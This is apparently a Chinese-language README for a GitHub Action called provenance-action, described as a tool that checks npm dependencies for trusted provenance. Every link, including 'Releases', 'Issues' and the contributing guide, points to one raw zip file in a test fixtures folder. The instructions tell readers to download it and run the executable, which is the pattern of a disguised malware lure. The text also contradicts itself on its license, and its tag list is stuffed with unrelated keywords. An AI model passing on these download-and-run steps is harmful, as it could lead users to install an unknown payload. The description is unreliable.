ZoobyMoo2744/provenance-action

# 🚀 provenance-action - 通过来源检查确保 CI 安全 [](https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip) ## 📦 概述 provenance-action 帮助您在持续集成 (CI) 流程中维护安全性。该工具检查 lockfile 中列出的依赖项是否来自受信任的发布者。如果有任何依赖项丢失了其 npm provenance，它会向您发出警报。这样，您可以保护您的项目免受恶意软件包的侵害。 ## 🚀 入门指南 要开始使用 provenance-action，请按照以下步骤操作： 1. **访问发布页面：** 前往 [Releases 页面](https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip) 下载最新版本的软件。  2. **选择最新版本：** 在页面上查找列出的最新版本。通常，它会位于列表顶部。点击它以查看详细信息。 3. **下载软件：** 向下滚动找到与此版本相关的资产 (assets)。点击适合您操作系统的文件开始下载。 ## 📥 下载与安装 要下载并安装 provenance-action，请按照以下步骤操作： 1. **访问 Releases 页面：** [点击此处访问 Releases 页面](https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip)。 2. **选择正确的文件：** 根据您的操作系统，选择列出的文件之一。 - 对于 Windows，下载 `https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip`。 - 对于 macOS，下载 `provenance-action-macos`。 - 对于 Linux，下载 `provenance-action-linux`。 3. **运行文件：** - 如果您下载了 `.exe` 文件 (Windows)，双击运行它。 - 对于 macOS 或 Linux，打开终端，导航到下载文件的文件夹，然后输入 `chmod +x provenance-action-macos` 或 `chmod +x provenance-action-linux` 使其可执行，然后使用 `./provenance-action-macos` 或 `./provenance-action-linux` 运行它。 ## ⚙️ 系统要求 在安装之前，请确保您的系统满足以下要求： - **操作系统：** - Windows 10 或更高版本 - macOS Mojave (10.14) 或更高版本 - Linux (大多数发行版) - **内存：** - 至少 1 GB RAM。 - **磁盘空间：** - 100 MB 的可用磁盘空间用于安装。 ## 🔍 如何使用 安装完成后，您可以在 CI 流程中开始使用 provenance-action： 1. **集成 GitHub Actions：** 将该 action 添加到您的 GitHub workflow YAML 文件中。 示例： name: CI on: push: branches: - main jobs: security-check: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v2 - name: Run Provenance Check uses: ZoobyMoo2744/provenance-action@latest 2. **查看结果：** workflow 运行后，请检查 GitHub 仓库中的 Actions 选项卡以查看结果。如果有任何依赖项缺乏 provenance 或受信任状态，您将收到通知。 ## 💡 功能特性 - **安全依赖项检查：** 自动验证您的软件包是否来自受信任的来源。 - **集成 CI/CD：** 与 GitHub Actions 无缝协作以进行自动化检查。 - **可自定义警报：** 根据您的项目需求配置通知。 ## 📞 支持 如果您遇到任何问题或有疑问： - 查看我们的 [GitHub Issues](https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip) 页面以获取常见问题和解决方案。 - 如果找不到所需的答案，请考虑开启一个新 issue。 ## 📄 许可证 provenance-action 是根据 MIT 许可证开源的。请随意根据本仓库中提供的许可证条款修改和分发它。 ## 📈 贡献 我们欢迎通过贡献来增强 provenance-action。如果您有想法或改进建议，请提交 pull request 或开启一个 issue 进行讨论！ 请务必遵循我们的 `https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip` 文件中提供的指南，以确保顺畅的贡献流程。 感谢您使用 provenance-action！访问我们的 [Releases 页面](https://raw.githubusercontent.com/ZoobyMoo2744/provenance-action/main/test/fixtures/yarn-v1/provenance-action-v1.6.zip) 下载最新版本，立即加强您的 CI 安全性。

标签：CI/CD安全, DevSecOps, GitHubActions, GNU通用公共许可证, Llama, LNA, MITM代理, Node.js, NPM安全, Provenance, Yarn, 上游代理, 云安全监控, 依赖管理, 包管理器, 可信发布者, 完整性校验, 恶意软件防护, 文档安全, 暗色界面, 源出处验证, 结构化查询, 统一API, 自动化安全, 自动化攻击, 自动化攻击, 软件开发工具包, 锁文件检查, 静态分析